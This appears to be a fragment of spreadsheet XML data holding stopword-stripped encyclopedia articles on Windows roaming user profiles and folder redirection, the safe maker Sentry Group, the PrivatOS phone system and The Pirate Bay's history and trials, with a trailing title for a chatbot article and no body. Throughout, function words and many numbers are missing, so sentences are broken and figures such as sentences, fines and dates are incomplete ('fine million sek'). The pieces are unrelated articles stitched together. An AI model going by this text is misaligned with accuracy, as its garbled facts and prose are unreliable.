modified different computers time: when first computer modified document logs off, changes written network copy profile. when second computer logs off, different document version overwrites previously saved changes profile logout. compatibility different versions windows employ different incompatible user profile layouts. such, user roams computers different operating systems needs separate roaming profiles operating system. windows vista windows ".v2" suffix user profile folder isolate user profiles windows earlier. even microsoft technet advises users roam computers running windows vista/windows server 2008 windows 7/windows server 2008 user profiles windows 8/windows server 2012 windows 8.1/windows server 2012 also entirely backward-compatible, although initially used ".v2" suffix well. microsoft later released hotfixes instructions enable operating systems append ".v3" ".v4" suffixes respectively, segregating cross-os access. folder redirection deal profile copying problems, possible override default operation roaming, user accounts certain parts profile accessed local computer directly central file server rather copying local computer first. server goes down, users still access files offline files enhancements. end-user, folder redirection generally appear function differently using normal standalone computer. redirecting user's documents desktop accessed directly file server first steps speeding roaming profiles. however, party software begun store data application data portion roaming profile, also become useful redirect also accessed directly server. question raised entire roaming profile accessed directly server, copying needs done all. reasoning appears certain microsoft programs running time client computer tolerate sudden loss data folders server goes network disconnected. some portions must still copied back forth desktop appears folders available network-redirected folders down. caveats some programs work properly redirected profile folders refer file path server share: \\server\share\username\application data unless registry entry [hkey_current_user\software\microsoft\command processor] "disableunccheck"=dword:1 set, windows' command processor cannot working directory, batch files usually fail. possible install microsoft office vsto add-ins path. (appdata natural place users install addins without administration privileges.) adobe reader incompatible application data located file path since least version 9.0, would crash runtime error. adobe reader (10.0) partially compatible document protection mode path. openoffice.org similarly incompatible application data path, software crashes startup. developed available upcoming release. roaming profiles redirection supported autocad 2013.these problems paths usually fixed folders redirected drive mapping share: drive (say) mapped \\server\share\userhomedir appdir folder redirection user home directory:n:\application datahowever, drive mappings generally deprecated microsoft, unc-only redirection paths preferred implementation. application software versions various machines used profile need kept sync, options installed, otherwise software configuration files refer dynamic libraries extensions resources available another machine, causing system crash limited features corruption configuration. installing software account cause software partially functional accounts resources unavailable users depending access rights installer's personal folders. mandatory profiles folder redirection mandatory profiles folder redirection used mandatory profiles, useful situations desirable "lock down" general desktop appearance still allow users save documents network. example, used generic account anyone without password temporary use. redirecting documents desktop mandatory profile allow documents saved, logoff, changes desktop appearance desktop picture, internet explorer cookies, favorites, recent documents opened list reverted original state.folder redirection mandatory profiles accomplished denying write access central copy profile. when users off, expect regularly receive error profile could successfully copied back server. user also aware storing data certain locations cause data lost. example, desktop reset every time user logs mandatory profile's desktop, although seems fine save files desktop, user logs off, profile copied server, user logs back work saved desktop permanently lost without advance notice error logout profile could copied. setup methods active directory when user logs windows computer joined domain, consult following locations determine user roaming profile path configured: “set path remote desktop services roaming user profile” group policy login terminal server mstsprofilepath attribute ldap object, login terminal server “set roaming profile path users logging onto computer” group policy profilepath attribute ldap objectthe first configuration settings value overrides later ones. ldap attributes domain administrator, anyone else write access respective ldap user object according access-control list. value configured profile path typically given path folder file server, path typically contains variable “%username%” make specific user. roaming profile remote desktop server users specified "remote desktop services profile" tab. windows 2000 later versions, interface setting profilepath attribute available active directory users computers snap-in. windows earlier used user manager domains program. from many operating systems, ldap attributes accessed e.g. openldap command-line tools ldapsearch ldapmodify (after sasl/gssapi authentication). when user logs computer joined domain, windows shell check above-mentioned ldap attributes group policy files determine roaming user profile path. calls loaduserprofile function. microsoft documented precise file synchronization algorithm function implements, involves comparing file found local roaming profile timestamps, replace older file found computer. when user logs off, windows shell calls unloaduserprofile, applies similar file synchronization algorithm opposite direction, allow changes made roaming profile migrate back location user's roaming profile stored. addition, since windows possible specify group policy “background upload roaming user profile's registry file user logged apply synchronization process ntuser.dat file regular intervals (default hours). logging windows openssh windows load roaming profile. windows workstations running windows also roaming profiles, however users roaming profile files windows stored users home directory even separate location roaming specified. order roaming profiles windows workstation needs separate profile settings user logs local workstation enabled. enabling separate desktop settings windows enabled passwords windows control panel. roaming profiles windows compatible network mixture windows windows workstations user profile used workstation. this also case roaming profiles windows 4.0, windows 2000, windows compatibility issues differences version windows. roaming profiles windows vista windows compatible versions compatible earlier versions windows. separate profile folder extension created using roaming profiles windows vista easiest solution workstations running version windows. (see compatibility section) novell edirectory/netware roaming work novell servers, novell product "zenworks desktop management" needs installed server, associated workstation management package installed client computers. within directory, user package object created, enables roaming, specifies roaming profile stored, also stores associated group policies version windows users login. user package also enables dynamic local user, functions similar active directory, allowing account created edirectory desktop computer even local account exists advance, assigns local account privileges user, power user, administrator newly created local user account. windows user profile files stored users home directory subfolder version windows, example windows folder called "windows workstation profile" windows folder called "windows workstation profile" user package associated specific user account directory, associated organizational unit applies user accounts within user package also enables additional zenworks desktop management functions, remote view remote control desktop computer, network printers follow user desktop next, scheduling events wherever user logged windows while windows contain user profiles possible users personalised desktop business environment. windows administrative setup option network administrators could typing setup.exe windows could installed network share. windows setup local machine install local files making windows capable network. local files could saved user's home directory novell windows domain network allowing user settings roam machines, local machine scenario require hard drive could booted floppy network card. resetting profile occasionally users profile need reset profile becomes corrupt resolve issue application, reset would normally performed systems administrator helpdesk staff. perform reset affected user needs system folder users roaming profile stored server renamed, user profile must also deleted local workstation user logs otherwise user take locally stored profile next login. when profile cleared local machine user logs profile generated using default profile stored workstation, user logs profile copied back location users roaming profile stored. advantages enforcement administrative control using mandatory user profiles helps protect user's environment damaged user himself/herself. users access data anywhere network reliability easier backup data location server disadvantages each time user logs workstation, files settings transferred network; result login process takes longer user local profile. this particularly case profile large size. login time reduced profile cached files loaded local workstation using folder redirection redirect folders grow large size, like documents, network share. however, limitation addressed windows server 2008 active directory allowing folder redirection almost folders previously stored user's profile (including music, favorites, others) centralized secured network share. this means user's roaming profile easily reduced size smaller 20mb, thus eliminating long login times experienced previous versions when using folder redirection automatic caching offline files, user's files preferences available offline synced much efficient manner previously possible computer reconnected network using remote differential compression (rdc). another problem related different applications installed machines, applications stores information local settings registry, registry transferred across. corrupt application functionality roaming profile. redirected folder sharing redirected network folders able override separation 2000/xp vista/win7. example, types profiles redirected single documents folder, single desktop folder, user's account documents consistent profiles, even account settings different. redirected sharing folders application data lead data corruption, since microsoft intend application data shared different versions. alternatives user virtualization programs (such appsense) manage user profiles, settings, data, storing network share cloud. also folder redirection references external links microsoft msdn library: reference user profiles microsoft technet: windows server 2003 product help: user profiles best practices microsoft technet: windows server 2003: operations whitepaper: best practices user profiles</t>
  </si>
  <si>
    <t>Sentry Group</t>
  </si>
  <si>
    <t>sentrysafe brand safes manufactured rochester, york. owned master lock company. markets safes designed home, business, storage. addition security, sentrysafe includes range underwriters laboratories (ul)-rated safes protect valuables fire water. history 1930, john brush, brother-in-law, willard punnett, opened small shop manufacture safes west avenue rochester, york. brush-punnett company pioneer stamping (metalworking) steel safes. during long arduous startup period spanned great depression world company success selling safes vassar college dormitories steel skids eastman kodak. 1943, purchasing sister brother's-in-law interest, john brush became sole owner company. brush's intent pass business sons john jr., richard, robert. john joined business 1954 serving u.s. army corps, graduating lawrence university (1950) harvard business school. company changed name john brush 1955. brush moved plant linden avenue rochester 1968, 50,000 (5,000 m2). 1987, began business name sentry group, order better identify company trademark name safes "sentry". sentry group produces fire-resistant chests, safes, security storage containers, safes company world several awards, including "vendor year" lowe's 1999, wal-mart 2001, officemax 2002. 2014 sentry sold master lock, division fortune brands home security. 2016 master lock closed rochester, based production facilities moved production mexico. legal cases 1991, michael redman virginia brought product liability suit sentry group coin collection stolen sentry supreme safe, model #5570. redman noticed safe value-tique advertisement appeared magazine coin world. magazine advertised safe “burglar deterrent”.redman jury verdict district court, case appealed. united states court appeals fourth circuit reversed decision, holding redman failed present evidence demonstrating safe violated industry standards, government standards, reasonable consumer expectations. redman's safe specifically designed meet fire-resistant standards, “burglar deterrent” standards, even though provide degree protection burglary.” expert witness testified materials enhance burglar-resistance safes consequently reduce fire-resistance. notes references "about sentrysafe" "made hometown: sentrysafe, 13wham, december 2012" sentry, employees feel secure", news website "alfred university presents awards four rochester-area family businesses", press release 5/24/01, alfred university website "schumer pushes credit safes could boost jobs rochester safemaker" senator charles schumer website "sentry group begins making large capacity safes here", rochester business journal, andrea deckert, august 2005. sentry safe guide "the story american small business," sentry group company pamphlet, 2005. "fireproof hard drives unveiled sentry," rochester democrat chronicle, november 2007, available http://www.democratandchronicle.com/apps/pbcs.dll/article?aid=/20071115/business/71115006/1001 "sentry group partners maxtor storage solutions fire-safe/waterproof hard drives," sentry group press release, november 2007, available https://web.archive.org/web/20071117121254/http://www.sentrysafe.com/content/news.aspx "last many sentry safe workers pittsford", 13wham, june 2016, http://13wham.com/news/local/last-day-for-many-sentry-safe-workers-in-pittsford external links official website</t>
  </si>
  <si>
    <t>PrivatOS</t>
  </si>
  <si>
    <t>privatos operating system used blackphone june 2014, june 2016. targeted users sought improved privacy security. provided encryption phone calls, emails, texts, internet browsing. privatos modified version android, forked android 4.4.2, came bundle security-minded tools. however, contrast android, privatos open source. company shipped privatos, technologies joint venture makers geeksphone, silent circle. background concept encrypted phone long interest silent circle founder creator, phil zimmerman. video blackphone's website, zimmerman said, wait rest technology infrastructure catch make possible secure telephony. kind detour waiting rest technology catch make really good secure telephony possible. features company stated operating system able “close backdoors” usually found major mobile operating systems. some major features privatos anonymous search, privacy-enabled bundled apps, smart disabling wi-fi except trusted hotspots, control permissions, private communication (calling, texting, video chat, browsing, file sharing conference calls). geeksphone also claimed phone would receive frequent secure updates blackphone directly. reception technica praised blackphone's security center privatos gave control permissions liked privatos came bundled silent phone, silent text, disconnect disconnect search services. like phone’s performance mediocre, using custom meant google play benefits google ecosystem, spotty support sideloaded apps, reliance amazon third-party stores. after month using device, joshua drake accuvant concluded blackphone's security claims overstated, criticizing closed-source nature lack kernel hardening features, praising fast patching added features. references</t>
  </si>
  <si>
    <t>The Pirate Bay</t>
  </si>
  <si>
    <t>pirate (sometimes abbreviated tpb) online index digital content entertainment media software. founded 2003 swedish think tank piratbyrån, pirate allows visitors search, download, contribute magnet links torrent files, facilitate peer-to-peer (p2p) file sharing among users bittorrent protocol. pirate sparked controversies discussion legal aspects file sharing, copyright, civil liberties become platform political initiatives established intellectual property laws well central figure anti-copyright movement. website faced several shutdowns domain seizures, switching series addresses continue operating.in april 2009, website's founders (peter sunde, fredrik neij, gottfrid svartholm) found guilty pirate trial sweden assisting copyright infringement sentenced serve year prison fine. countries, internet service providers (isps) ordered block access website. subsequently, proxy websites providing access founders svartholm, neij, sunde released 2015 served shortened sentences. history pirate established september 2003 swedish anti-copyright organisation piratbyrån (lit. 'the piracy bureau'); separate organisation since october 2004. pirate first gottfrid svartholm fredrik neij, known nicknames "anakata" "tiamo", respectively. they accused "assisting making copyrighted content available" motion picture association america. 2006, website's servers stockholm raided taken away swedish police, leading three days downtime. pirate claims non-profit entity based seychelles; however, disputed.the pirate involved number lawsuits, plaintiff defendant. april 2009, peter sunde, fredrik neij, gottfrid svartholm, carl lundström found guilty assistance copyright infringement sentenced year prison payment fine million (approximately 4.2m usd, 2.8m gbp, 3.1m eur), trial nine days. defendants appealed verdict accused judge giving political pressure. november 2010, swedish appeals court upheld verdict, decreasing original prison terms increasing fine million sek. 2010, injunction bandwidth provider, site taken offline. access website later restored message making injunction front page. june 2010, group piratbyrån disbanded death kopimi botani, prominent member co-founder group.the pirate hosted several years prq, sweden-based company, owned creators gottfrid svartholm fredrik neij. said provide "highly secure, no-questions-asked hosting services customers". from 2011, serious tubes networks started providing network connectivity pirate bay. january 2012, pirate added category physibles. these files described "data objects able (and feasible) become physical" using printer. 2012, part google's newly inaugurated "transparency report", company reported 6,000 formal requests remove pirate links google search index; requests covered 80,500 urls, five copyright holders requests consisting froytal services llc, bang bros, takedown piracy llc, amateur teen kingdom, international federation phonographic industry (ifpi). august 2013, pirate announced release piratebrowser, free browser used circumvent internet censorship. site visited torrent directory world wide 2003 november 2014, kickasstorrents visitors according alexa. december 2014, google removed google play apps store "the pirate bay" title.on december 2014, pirate raided swedish police, seized servers, computers, equipment. several torrent related sites including eztv, zoink, torrage istole tracker also shut addition pirate bay's forum suprbay.org. second raid eztv reported showing "signs life" uploads extratorrent kickasstorrents supporting proxy sites like eztv-proxy.net main website's backend addresses. several copies pirate went online next several days, notably oldpiratebay.org, created isohunt.on 2015, domain pirate ordered seized following ruling swedish court. site reacted adding domains place. judgment appealed 2015. 2016, appeal dismissed court ruled domains turned swedish state. site returned using original .org domain 2016. august 2016, government shut kickasstorrents, resulted pirate becoming visited bittorrent website. website content pirate allows users search magnet links. these used reference resources available download peer-to-peer networks which, opened bittorrent client, begin downloading desired content. (originally, pirate allowed users download bittorrent files (torrents), small files contain metadata necessary download data files users). torrents organised categories: "audio", "video", "applications", "games", "porn" "other". registration requires email address free; registered users upload torrents comment torrents. according study newly uploaded files 2013 torrentfreak, uploads television shows movies, porn second place uploads, audio made uploads. registration users closed 2019 following problems uploading malware torrents.the website features browse function enables users available broad categories like audio, video, games, well sub-categories like audio books, high-res movies, comics. since january 2012, also features "physibles" category 3d-printable objects. contents categories sorted file name, number seeders leechers, date posted, etc. piratbyrån described pirate long-running project performance art. normally, front page pirate featured drawing pirate ship logo 1980s anti-copyright infringement campaign, "home taping killing music", sails instead jolly roger symbol usually associated pirate ships. technical details initially, pirate bay's four linux servers custom server called hypercube. version open-source. june 2005, pirate updated website effort reduce bandwidth usage, reported http requests millisecond four servers, well create user friendly interface front-end website. website runs lighttpd dynamic front ends, mysql database back end, sphinx search systems, memcached caching queries php-sessions varnish front lighttpd caching static content. september 2008, pirate consisted dedicated servers including nine dynamic fronts, database, search engines, eight bittorrent trackers.on december 2007, pirate finished move hypercube opentracker bittorrent tracking software, also enabling tracker protocol hypercube lacked support. this allowed multicast used synchronise multiple servers much faster before. opentracker free software.in june 2008, pirate announced servers would support encryption response sweden's wiretapping law. january 2009, pirate launched ipv6 support tracker system, using ipv6-only version opentracker. november 2009, pirate shut tracker service permanently, stating centralised trackers longer needed since distributed hash tables (dht), peer exchange (pex), magnet links allow peers find content decentralised way.on february 2012, pirate announced facebook post february site would longer offer torrent files, would instead offer magnet links. site commented: "not torrents cheaper also make harder common enemies stop us." site added torrents shared fewer people retain torrent files, ensure compatibility older software support magnet links. funding early financing april 2007, rumour confirmed swedish talk show bert pirate received financial support right-wing entrepreneur carl lundström. this caused consternation since lundström, heir wasabröd fortune, known financing several far-right political parties movements like sverigedemokraterna bevara sverige svenskt (keep sweden swedish). during talk show, piratbyrån spokesman tobias andersson acknowledged "without lundström's support, pirate would able start" stated money went towards acquiring servers bandwidth. donations from 2004 2006, pirate "donate" link donations page listed several payment methods, stated funds supported tracker, offered time-limited benefits donors advertisements "vip" status. after that, link removed home page, donations page recommended donating local pro-piracy group" time, redirected site's main page. billboard claimed site 2009 "appeals donations keep service running". 2006, petter nilsson, candidate swedish political reality show toppkandidaterna (the candidates), donated 35,000 (us$4,925.83) pirate bay, used servers.in 2007, site fund intended sealand, platform debated micronation status. 2009, convicted principals requested users stop trying donate money fines, refused them. 2013, pirate published bitcoin address site front page donations, well litecoin. merchandising site links online store selling site-related merchandise, first noted 2006 svenska dagbladet. advertising since 2006, website received financing advertisements result pages. according speculations svenska dagbladet, advertisements generate 600,000 (us$84,000) month. investigation 2006, police concluded pirate brings million (us$169,000) year advertisements. prosecution estimated 2009 trial emails screenshots advertisements million (us$1.4m) year, indictment used estimate police investigation. lawyers site's administrators counted 2006 revenue closer 725,000 (us$102,000). verdict first trial, however, quoted estimate preliminary investigation.as 2008, ifpi claims website extremely profitable, pirate engaged making profit supporting people's rights. website insisted allegations true, stating, "it's free operate site scale", and, making lots money svartholm, working late office tonight, sitting beach somewhere, working tan." response claims annual revenue exceeding us$3 million made ifpi, site's spokesman peter sunde argues website's high bandwidth, power, hardware costs eliminate potential profit. pirate bay, says, ultimately operating loss. 2009 trial, defence estimated site's yearly expenses 800,000 (us$110,000).there unintentional advertisers. 2007, online agency placed wal-mart simpsons "along search results included downloads series". 2012, banner canada's department finance economic action plan placed atop search results, part larger "media buy", pulled "quickly". cryptocurrency mining 2017, pirate embedded scripts website would consume resources visitors' computers order mine monero cryptocurrency. visitors initially informed scripts added. after negative feedback, operators published announcement stating test could replace advertisements. mining script appeared disappeared website repeatedly following months 2018. according site's usage policy, reserves right charge commercial policy violators basic €5,000 plus bandwidth costs arise violation". co-founder peter sunde accused swedish book publishers, scraped site information copyrighted books, violating usage policy, asserted tpb's copyright database. projects team behind pirate worked several websites software projects varying degrees permanence. 2007, bayimg, image hosting website similar tinypic went online june. pre-publication images posted bayimg became part legal battle conde nast's network later allegedly hacked. july, "within hours ingmar bergman's death", bergmanbits.com launched, listing torrents director's films, online mid-2008. august, pirate relaunched bittorrent website suprnova.org perform functions pirate bay, different torrent trackers, site languished; domain returned original owner august 2010, redirects torrentfreak.tv. suprbay.org introduced august official forum thepiratebay.org various sites connected users request reseeding torrents, report malware within torrent files illegal material thepiratebay.org.boink announced october 2007 response raid oink's pink palace, music-oriented bittorrent website. month later sunde cancelled boink, citing many music websites created since downfall oink. dashboard widget released december, listing "top stuff currently tpb, either category full list". slopsbox, disposable email address anti-spam service, also appeared december, reviewed 2009. 2008, baywords launched free blogging service lets users site blog anything long break swedish laws. december, pirate resurrected sharereactor combined ed2k bittorrent site. month, mobile video converter released, designed convert video files playback mobile devices iphone, blackberry, android, many nokia windows mobile devices.in 2009, pastebay, note sharing service similar pastebin, made available public march. video video streaming/sharing site announced june "the youtube killer", content viewable html 5-capable browsers. site "extreme beta" phase; message homepage instructed user "don't expect anything work all". video never completed april 2013, video inaccessible. april 2011, pirate temporarily changed name "research bay", collaborating researchers lund university cybernorms group large poll users. researchers published results online "the survey bay", public creative commons project 2013. january 2012, site announced promo bay; "doodles" selected musicians, artists others could rotated onto site's front page future date. brazilian novelist paulo coelho promoted, offering collection books free download. november, 10,000 artists reported signed preserves dated collection exhibited logos. december 2012, isps virgin media, started blocking promo stopped days later reversed position. purchases january 2007, micronation sealand sale, acfi pirate tried sealand government, however, want involved pirate bay, opinion file sharing represented "theft proprietary rights". plan formed island instead, never implemented, despite website raised us$25,000 (€15,000) donations cause.the news blog torrentfreak reported october 2007 internet domain ifpi.com, previously belonged international federation phonographic industry, anti-piracy organisation, acquired pirate bay. when asked hold domain, sunde told torrentfreak, "it's hack, someone gave domain name. idea we're keeping it." website renamed "the international federation pirates interests" however, ifpi filed complaint world intellectual property organization shortly thereafter, subsequently ordered pirate return domain name ifpi. cryptocurrency 2021, pirate launched pirate token, bep-20 token, used sustain community develop tools website. incidents 2006 raid 2006, raid pirate people involved website took place ordered swedish judge tomas norström, later presiding judge 2009 trial, prompted allegations copyright violations. police officers shut website confiscated servers, well servers hosted pirate bay's internet service provider, prq. company owned operators pirate bay. three people gottfrid svartholm, mikael viborg, fredrik neij held police questioning, released later evening. servers room seized, including running website piratbyrån, independent organisation fighting file sharing rights, well servers unrelated pirate file sharing activities. equipment hardware routers, switches, blank cds, machines also seized.the motion picture association america (mpaa) wrote press release: "since filing criminal complaint sweden november 2004, film industry worked vigorously swedish u.s. government officials sweden shut illegal website down." mpaa glickman also stated, "intellectual property theft problem film industries world glad local government sweden helped stop pirate continuing enable rampant copyright theft internet." mpaa press release forth justification raid claimed three arrests; however, individuals actually arrested, held questioning. release also reprinted john malcolm's allegation pirate making money distribution copyrighted material, criticism denied pirate bay.after raid, pirate displayed message confirmed swedish police executed search warrants breach copyright assisting breach. closure message initially caused confusion april 2005, april fools' day, pirate posted similar message prank, stating unavailable raid swedish anti-piracy bureau ifpi. piratbyrån temporary news blog inform public incident. june 2006, pirate available again, logo depicting pirate ship firing cannonballs hollywood sign.the pirate servers belgium russia future case another raid. according pirate bay, years following raid, grew million million registered users million million peers. pirate claims million active users.sweden's largest technology museum, swedish national museum science technology, acquired confiscated servers 2009 exhibited great symbolic value "big problem opportunity". autopsy photos september 2008, swedish media reported public preliminary investigation protocols concerning child murder case known arboga case made available torrent pirate bay. sweden, preliminary investigations became publicly available moment lawsuit filed ordered court individual. document included pictures autopsy murdered children, caused father nicklas jangestig urge website pictures removed. pirate refused remove torrent. number downloads increased 50,000 days later. september 2008, website's press contact peter sunde participated debate program debatt public broadcaster svt. sunde agreed participate condition father nicklas jangestig would take part debate. jangestig ultimately participate program telephone, made sunde feel betrayed svt. this caused pirate suspend press contacts following day."i think judge something ethical unethical people want internet", said pirate bay's spokesperson peter sunde tv4. legal issues september 2007, large number internal emails leaked anti-piracy company mediadefender anonymous hacker. some leaked emails discussed hiring hackers perform ddos attacks pirate bay's servers trackers. response leak, pirate filed charges sweden mediadefender clients twentieth century sweden sweden universal music group sweden universal pictures nordic paramount home entertainment (sweden) atari nordic activision nordic, ubisoft sweden sony music entertainment (sweden) sony pictures home entertainment nordic charges pursued. mediadefender's stocks fell sharply incident, several media companies withdrew service company announced leak caused $825,000 losses.later, pirate co-founder peter sunde accused police investigator keyzer conflict interest declined investigate mediadefender. keyzer later accepted mpaa member studio warner brothers. leaked emails revealed mpaa member studios hired mediadefender pollute pirate bay's torrent database. official letter swedish minister justice, international olympic committee (ioc) requested assistance swedish government prevent pirate distributing video clips beijing olympics. claimed million downloads footage olympics mostly opening ceremony. pirate bay, however, take anything down, temporarily renamed website beijing bay. trial behind pirate started sweden february 2009. they accused breaking swedish copyright law. defendants, however, continued confident outcome. half charges pirate dropped second trial.the three operators site investor carl lundström convicted stockholm district court april 2009 sentenced year jail total million (us$3.6 million, million eur, million gbp) fines damages. defendants' lawyers appealed svea court appeal requested retrial district court, alleging bias part judge tomas norström. 2009, several record companies sued neij, svartholm, sunde also pirate bay's main internet service provider black internet. they required enforcement ending pirate bay's accessory copyright infringement stopped despite court order april, complaint listed several pages works shared help site. suit joined several major film companies july. stockholm district court ruled august black internet must stop making available specific works mentioned judgment, face 500,000 fine. company notified order august, complied disconnecting pirate bay. computer sweden noted judgment order pirate disconnected, option stopping activity site. first time sweden forced stop providing access website. public support fund fronted cover legal fees appeal. pirate party leader rickard falkvinge submitted case parliamentary ombudsman review, criticising court's order make intermediaries responsible relayed content assign active crime prevention tasks private party.on october 2009, stockholm district court ordered temporary injunction neij svartholm penalty 500,000 each, forbidding participating operation pirate bay's website trackers.on 2010, svea court appeal decided change orders black internet neij svartholm.on february 2012, supreme court sweden refused hear appeal conviction case, agreed decision svea court appeal, upheld sentences november 2011.on september 2012, pirate co-founder gottfrid svartholm warg arrested cambodia. detained phnom penh officers executing international warrant issued april turn serve one-year jail sentence copyright violations. december 2012, administrators changed homepage urge users send warg, jail, "gifts letters". march 2013, pirate claimed blog post moved servers north korea. incident turned hoax. april 2013, within week pirate moved servers greenland iceland martin, either response legal threats preemptively. december 2013, site changed domain (ascension island), following seizure domain. december, site moved (peru), december (guyana). following site's suspension domain, december pirate returned (sweden), previously occupied february 2012 april 2013. trial pirate trial joint criminal civil prosecution sweden four individuals charged promoting copyright infringement others pirate site. criminal charges supported consortium intellectual rights holders ifpi, filed individual civil compensation claims owners pirate bay.swedish prosecutors filed charges january 2008 fredrik neij, gottfrid svartholm, peter sunde; carl lundström, swedish businessman businesses sold services site. prosecutor claimed four worked together administer, host, develop site thereby facilitated people's breach copyright law. some cases copyright infringements originally listed, related music files, movies, games. case involving music files later dropped copyright holder made file available pirate site. addition, claims damages million kronor (us$13 million, €12.5 million) filed. case decided jointly judge three appointed judges. according swedish media, lead judge involved pro-copyright organisation, board another, denied involvement constituted conflict interest.the trial started february 2009, district court (tingsrätt) stockholm, sweden. hearings ended march 2009 verdict announced 11:00 friday april 2009: peter sunde, fredrik neij, gottfrid svartholm carl lundström found guilty sentenced serve year prison fine million swedish krona (app. €2.7 million us$3.5 million). defendants appealed verdict. appeal trial concluded october 2010, verdict announced november. appeal court shortened sentences three defendants appeared court day. neij's sentence reduced months, sunde's eight, lundström's four. however, fine increased million kronor.on february 2012, supreme court sweden refused hear appeal case, prompting site change official domain name thepiratebay.se thepiratebay.org. move domain claimed prevent susceptibility laws taking control site. april 2013, site changed domain name thepiratebay.gl, greenland tld, anticipation possible seizure swedish authorities domain. change proved short lived, site returned domain april 2013 blocked domain tele-post, administers domains greenland. tele-post cited danish court ruling site violation copyright laws.founders svartholm, neij, sunde released finished serving sentences 2015. service issues 2007, pirate attacked group hackers. they copied user database, included million users. pirate claimed users data value passwords e-mails encrypted hashed. some blogs stated group known (arga unga hackare, swedish "angry young hackers") suspected executing attack; however, stated computer sweden newspaper involved would take revenge responsible attack.on april 2009, website pirate fibre ipv4 connectivity issues. there widespread speculation forced outage swedish anti-piracy group, accelerated somewhat adding contact details swedish anti-piracy group's lawyers ripe database record. site forums still available ipv6 time.on august 2009, pirate bay's upstream providers ordered discontinue service website swedish court response civil action brought several entertainment companies including disney, universal, time warner, columbia, sony, nbc, paramount. according blog, caused downtime hours; however, users unable access site immediately following relocation unrelated technical difficulties. site fully operational everyone within hours.on october 2009, transit providers pirate blocked pirate traffic causing outage users around world. day, site reportedly back online address cyberbunker, located netherlands. known whether pirate actually located cyberbunker whether using cyberbunker service routes cyberbunker addresses datacenter around world. these routes visible outside world. cyberbunker given court injunction 2010, taking site offline briefly; later day, hosting restored sweden's pirate party. former spokesman pirate bay, peter sunde, commented would difficult stop site would seen political censorship anyone tries shut down.on july 2010, group argentine hackers gained access pirate bay's administration panel security breach backend pirate website. they able delete torrents expose users' ip-addresses, emails md5-hashed passwords. pirate taken offline upgrades. users visiting website following message: "upgrading stuff, database backups, soon back again. btw, nice weather outside think."on 2012, pirate experienced major ddos attack, causing site largely inaccessible worldwide around hours. pirate said know behind attack, although "had suspicions".on 2015, pirate went offline several hours, apparently result properly configuring certificate. acquisition discussion june 2009, swedish advertising company global gaming factory announced intention site million (approximately us$8.5 million) (30m cash, shares).the pirate founders stated profits sale would placed offshore account would used fund projects pertaining "freedom speech, freedom information, openness internet". assurances made personal data transferred eventual sale (since personal data kept)." global gaming chief executive hans pandeya commented site's future saying would like introduce models entail content providers copyright owners paid content downloaded site", announced users would charged monthly access pirate bay. global gaming factory's letter intent expired september 2009, without transaction taken place. this company's financial difficulties. world" magazine regarded deal's future "doomed". december 2014 raid december 2014, police stockholm raided company's premises seized servers computers equipment, resulted website going offline. raid response complaint rights alliance, swedish anti-piracy group. pirate many peer-to-peer torrent-related websites apps went down. member crew arrested. torrentfreak reported torrent sites reported 5–10% increase traffic displaced users, though shutdown little effect overall piracy levels. retaliation raid, group hackers claiming part anonymous allegedly leaked email log-in details swedish government officials. pirate co-founder peter sunde commented blog post happy website shut down, believing successors done nothing improve site, criticising particular increased advertisements.isohunt since copied much original database made accessible oldpiratebay.org, searchable index pirate torrents. isohunt also released tool called open bay, allow users deploy version pirate website. tool responsible around mirror sites. since december 2014, pirate bay's facebook page unavailable. december 2014, website resumed domain thepiratebay.se, showing flip clock length time days hours site offline, waving pirate flag. from hosted period moldova, trabia network (moldo-german company) servers. pirate began using services cloudflare, company offers reverse proxy services. january 2015, website presented countdown february 2015. website returned prominent phoenix logo displayed domain thepiratebay.se january 2015. error downtimes beginning october 2018, clearnet pirate website started inaccessible locations around world, showing error 522. result, direct visits website dropped percent october. incident found unrelated internet provider blocking domain name problem, exact cause determined. site's domain proxies remained unaffected.the error problem occurred early march 2020, site's admins unable would resolved. after month, site's functionality restored update domain records cloudflare nameservers. censorship controversies anti-copyright movement pirate sparked controversies discussion legal aspects file sharing, copyright, civil liberties become platform political initiatives established intellectual property laws central figure anti-copyright movement. website faced several shutdowns domain seizures "did little take site offline, simply switched series addresses continued operate". domain blocking countries pirate bay's website blocked countries, despite relative ease blocks circumvented countries. while pirate blocked countries, numerous mirror websites emerged make website available different urls, routing traffic around block.according google chairman eric schmidt, "government plans block access illicit filesharing websites could 'disastrous precedent' freedom speech"; also expressed google would "fight attempts restrict access sites pirate bay". sweden february 2017, sweden's patent market court appeal decided broadband provider bredbandsbolaget must block customers accessing file sharing site pirate bay, overruling district court ruling contrary 2015. this first time site openly blocked sweden. rest isps expected follow court orders.the telia mandated block pirate dynamic injunction december 2019. this means rights holders find website pirate bay) inform telia legally required block weeks. telia objected blocking order attempted appeal injunction lost june 2020 must maintain dynamic injunction years. censorship corporations facebook after pirate introduced feature march 2009 easily share links torrents social networking site facebook, wired found facebook started blocking links. inspection, discovered messages containing links pirate public private messages, regardless content, blocked. electronic frontier foundation lawyers commented facebook might working electronic communications privacy intercepting user messages, facebook chief privacy officer chris kelly said right blocks links "demonstrated disregard intellectual property rights", following users' agreement terms service. links similar sites blocked. microsoft march 2012, microsoft blocked windows live messenger messages containing links pirate bay. when user sends instant message contains link pirate bay, windows live messenger prompts warning claims "blocked reported unsafe". block instant messages contain malicious spam urls based intelligence algorithms, third-party sources, and/or user complaints. pirate urls flagged consequently blocked", microsoft told register emailed statement. media pirate featured steal this film (2006), documentary series society filesharing, produced league noble peers; danish documentary good copy copy, explores issues surrounding file copyright; documentary afk. pirate topic us-syndicated radio show media.björn ulvaeus, member swedish music group abba, criticised copyright infringing activities pirate supporters "lazy mean". contrast, brazilian best-selling author paulo coelho embraced free sharing online. coelho supports pirate offered witness 2009 trial. accounts much growing sales work shared internet comments person share selfish, bitter alone". also references external links official website</t>
  </si>
  <si>
    <t>Zo (bot)</t>
  </si>
  <si>
